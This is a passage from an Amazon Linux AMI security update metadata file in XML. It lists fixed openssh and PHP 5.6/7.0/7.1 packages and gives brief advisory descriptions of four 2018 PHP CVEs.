arch="x86_64"><filename>Packages/openssh-server-7.4p1-16.69.amzn1.x86_64.rpm</filename></package><package name="openssh" version="7.4p1" release="16.69.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-7.4p1-16.69.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="7.4p1" release="16.69.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-7.4p1-16.69.amzn1.i686.rpm</filename></package><package name="openssh-cavs" version="7.4p1" release="16.69.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-cavs-7.4p1-16.69.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.10.3" release="2.16.69.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.10.3-2.16.69.amzn1.i686.rpm</filename></package><package name="openssh-ldap" version="7.4p1" release="16.69.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-7.4p1-16.69.amzn1.i686.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="16.69.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-7.4p1-16.69.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="16.69.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-7.4p1-16.69.amzn1.i686.rpm</filename></package><package name="openssh-server" version="7.4p1" release="16.69.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-7.4p1-16.69.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1019</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1019: medium priority package update for php56 php70 php71</title><issued date="2018-05-10 18:23:00" /><updated date="2018-05-10 23:42:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-10549:
An issue was discovered in PHP before 5.6.36, 7.0.x before 7.0.30, 7.1.x before 7.1.17, and 7.2.x before 7.2.5. exif_read_data in ext/exif/exif.c has an out-of-bounds read for crafted JPEG data because exif_iif_add_value mishandles the case of a MakerNote that lacks a final &#039;\0&#039; character.
1573797:
CVE-2018-10549 php: Out-of-bounds read in ext/exif/exif.c:exif_read_data() when reading crafted JPEG data
CVE-2018-10548:
An issue was discovered in PHP before 5.6.36, 7.0.x before 7.0.30, 7.1.x before 7.1.17, and 7.2.x before 7.2.5. ext/ldap/ldap.c allows remote LDAP servers to cause a denial of service (NULL pointer dereference and application crash) because of mishandling of the ldap_get_dn return value.
1573805:
CVE-2018-10548 php: Null pointer dereference due to mishandling of ldap_get_dn return value allows denial-of-service by malicious LDAP server or man-in-the-middle attacker
CVE-2018-10547:
An issue was discovered in ext/phar/phar_object.c in PHP before 5.6.36, 7.0.x before 7.0.30, 7.1.x before 7.1.17, and 7.2.x before 7.2.5. There is Reflected XSS on the PHAR 403 and 404 error pages via request data of a request for a .phar file. NOTE: this vulnerability exists because of an incomplete fix for CVE-2018-5712.
1573814:
CVE-2018-10547 php: Reflected XSS vulnerability on PHAR 403 and 404 error pages
CVE-2018-10546:
An issue was discovered in PHP before 5.6.36, 7.0.x before 7.0.30, 7.1.x before 7.1.17, and 7.2.x before 7.2.5. An infinite loop exists in ext/iconv/iconv.c because the iconv stream filter does not reject invalid multibyte sequences.
1573802:
CVE-2018-10546 php: Infinite loop in ext/iconv/iconv.c when using stream filter with convert.incov on invalid sequence leads to denial-of-service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10546" title="" id="CVE-2018-10546" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10547" title="" id="CVE-2018-10547" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10548" title="" id="CVE-2018-10548" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10549" title="" id="CVE-2018-10549" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-opcache" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.36" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.36-1.138.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.36" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.36-1.138.amzn1.i686.rpm</filename></package><package name="php71-soap" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-soap-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-debuginfo" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-debuginfo-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-json" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-json-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-opcache" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-opcache-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-mysqlnd" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mysqlnd-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-pgsql" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pgsql-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-dblib-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-gd" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gd-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-dba" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dba-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-embedded" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-embedded-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-gmp" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gmp-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-intl" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-intl-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-recode" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-recode-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-imap" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-imap-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-dbg" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dbg-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-pdo" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-fpm" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-fpm-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-pspell" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pspell-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-mbstring" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mbstring-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-common" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-common-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-devel" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-devel-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-xmlrpc" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xmlrpc-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-mcrypt" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mcrypt-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-bcmath" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-bcmath-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-enchant" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-enchant-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-xml" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xml-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-process" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-process-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-cli" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-cli-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-snmp" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-snmp-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-odbc" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-odbc-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-tidy" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-tidy-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-ldap" version="7.1.17" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-ldap-7.1.17-1.32.amzn1.x86_64.rpm</filename></package><package name="php71-dba" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dba-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-gmp" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gmp-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-ldap" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-ldap-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-xmlrpc" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xmlrpc-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-opcache" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-opcache-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-dblib-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-mysqlnd" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mysqlnd-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-cli" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-cli-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-xml" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xml-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-fpm" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-fpm-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-enchant" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-enchant-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-mcrypt" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mcrypt-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-bcmath" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-bcmath-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-dbg" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dbg-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-recode" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-recode-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-snmp" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-snmp-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-pgsql" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pgsql-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-embedded" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-embedded-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-intl" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-intl-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-imap" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-imap-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-pspell" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pspell-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-json" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-json-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-tidy" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-tidy-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-common" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-common-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-process" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-process-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-devel" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-devel-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-odbc" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-odbc-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-soap" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-soap-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-gd" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gd-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-mbstring" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mbstring-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-debuginfo" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-debuginfo-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php71-pdo" version="7.1.17" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-7.1.17-1.32.amzn1.i686.rpm</filename></package><package name="php70-gmp" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gmp-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-debuginfo" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-debuginfo-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-mysqlnd" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mysqlnd-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-pspell" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pspell-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-soap" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-soap-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-common" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-common-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-imap" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-imap-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-recode" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-recode-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-enchant" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-enchant-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-tidy" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-tidy-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-xml" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xml-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-zip" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-zip-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-process" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-process-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-mcrypt" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mcrypt-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-cli" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-cli-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-json" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-json-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-ldap" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-ldap-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-dbg" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dbg-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-intl" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-intl-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-snmp" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-snmp-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-fpm" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-fpm-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-gd" version="7.0.30" release="1.29.amzn1" epoch="0" 